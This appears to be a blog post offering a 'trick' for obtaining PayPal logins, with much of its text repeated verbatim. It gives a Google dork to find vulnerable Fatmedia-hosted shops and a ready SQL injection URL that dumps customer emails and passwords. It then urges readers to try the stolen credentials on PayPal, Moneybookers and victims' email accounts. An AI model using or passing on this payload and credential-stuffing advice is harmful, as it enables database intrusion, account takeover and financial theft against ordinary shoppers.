This is just a trick on how to get working paypal accounts for your online payment.
The fact that most websites make use of paypal as their method of payment also helps.
This exploit works only in Fatmedia Hosted shoppimg sites
Exploit:
Google dork= inurl:prod_list.asp?catid=
Result=
The fact that most websites make use of paypal as their method of payment also helps.
This exploit works only in Fatmedia Hosted shoppimg sites
Exploit:
Google dork= inurl:prod_list.asp?catid=
Result=
Code:
http://www.site.com/prod_list.asp?catid=15
Inject= +union+all+select+0%2C1%2C2%2C3%2C4%2Ccustomeremai l%2C6%2Ccustomerpassword%2C8%2C9%2C10+from+custome rs&Name=Christening&offset=8
Example:
http://www.site.com/prod_list.asp?catid=15+union+all+select+0%2C1%2C2%2C3%2C4%2Ccustomeremail%2C6%2Ccustomerpassword%2C8%2C9%2C10+from+customers&Name=Christening&offset=110
You will receive List of emails and password of customers in the website.Try logging them in to paypal,money bookers and even their emails.
Luckily you can get paypal logins
I've tried it,it works.
http://www.site.com/prod_list.asp?catid=15
Inject= +union+all+select+0%2C1%2C2%2C3%2C4%2Ccustomeremai l%2C6%2Ccustomerpassword%2C8%2C9%2C10+from+custome rs&Name=Christening&offset=8
Example:
http://www.site.com/prod_list.asp?catid=15+union+all+select+0%2C1%2C2%2C3%2C4%2Ccustomeremail%2C6%2Ccustomerpassword%2C8%2C9%2C10+from+customers&Name=Christening&offset=110
You will receive List of emails and password of customers in the website.Try logging them in to paypal,money bookers and even their emails.
Luckily you can get paypal logins
I've tried it,it works.
Post a Comment